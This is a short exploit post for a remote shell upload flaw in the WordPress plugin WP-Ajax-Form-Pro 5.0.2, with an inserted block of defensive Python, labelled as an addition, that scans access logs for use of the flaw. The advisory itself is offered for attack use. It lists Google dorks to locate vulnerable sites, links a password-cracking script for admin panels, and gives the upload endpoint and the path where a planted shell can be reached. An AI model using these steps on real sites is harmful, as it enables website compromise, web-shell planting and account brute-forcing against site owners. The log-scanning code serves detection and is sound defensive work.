>Exploit Title : WordPress WP-Ajax-Form-Pro Plugin 5.0.2 Remote Shell Upload Vulnerability
>Exploit Author: The Mechiavellian || "facebook.com/TheMachiavellian/"
>Vendor Homepage || Software link : ajaxformpro.com
>Software Price : 19$ - 89$
>Version : 5.0.2
>Google Dorks : 
- inurl:''/wp-content/plugins/wp-ajax-form-pro''
- intext:''AJAX Form Pro - All Rights Reserved''

>Admin Panel Login Path : 
http://website.com/wp-login.php

[+] use my account dictionary crack script : https://github.com/adem313/glory/blob/master/r.py
 - use WordPress wordlists to hack the admin panel

>Arbitrary File Upload/Remote Shell Upload Exploit : 
/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp

>Directory File Path : 
/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/uploads/YourShellhere.php
[+] accepts : .php - .gif - .jpg - .png - .html - .fla - .pdf
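
A defender-side check for the two paths above, as an added example that is not part of the original advisory: it scans web server access logs for POSTs to the uploader endpoint and for .php/.html files served from the uploads directory. The combined log format, the finding labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths as given in the advisory above.
PLUGIN = "/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/"
UPLOADER = PLUGIN + "do.upload.php"
UPLOAD_DIR = PLUGIN + "uploads/"
# Of the extensions the advisory lists as accepted, these are not inert media:
# .php runs on the server, .html renders as active content on the site's origin.
ACTIVE_EXT = (".php", ".html")

# Assumed input: Apache/nginx "combined" access log format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (client_ip, finding) for a relevant log line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m[1], m[2], m[3], int(m[4])
    # Drop the query string, decode %xx and collapse duplicate slashes
    # so trivial path variants still match.
    path = re.sub(r"/+", "/", unquote(target.split("?", 1)[0])).lower()
    if path == UPLOADER and method == "POST":
        return ip, ("uploader-post-denied" if status >= 400 else "uploader-post")
    if path.startswith(UPLOAD_DIR) and path.endswith(ACTIVE_EXT) and status < 400:
        return ip, "active-file-served"
    return None

def scan(lines):
    """Group findings per client IP, in log order."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits.setdefault(found[0], []).append(found[1])
    return hits

def _row(ip, method, target, status):  # builds one constructed sample line
    return f'{ip} - - [10/Jan/2024:10:00:00 +0000] "{method} {target} HTTP/1.1" {status} 0 "-" "-"'

# Constructed sample data (documentation IP ranges, made-up file names).
SAMPLE = [
    _row("203.0.113.7", "POST", UPLOADER + "?form_id=afp", 200),
    _row("203.0.113.7", "GET", UPLOAD_DIR + "a1.php", 200),
    _row("198.51.100.4", "GET", UPLOAD_DIR + "photo.jpg", 200),
    _row("198.51.100.9", "POST", "/" + UPLOADER, 403),
]
```

A client that shows "uploader-post" followed by "active-file-served" is the one to triage first; a served .php file under the uploads directory also means the web server is executing scripts from a directory that should only hold static files.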



exploit by Cyberizm Digital Security Team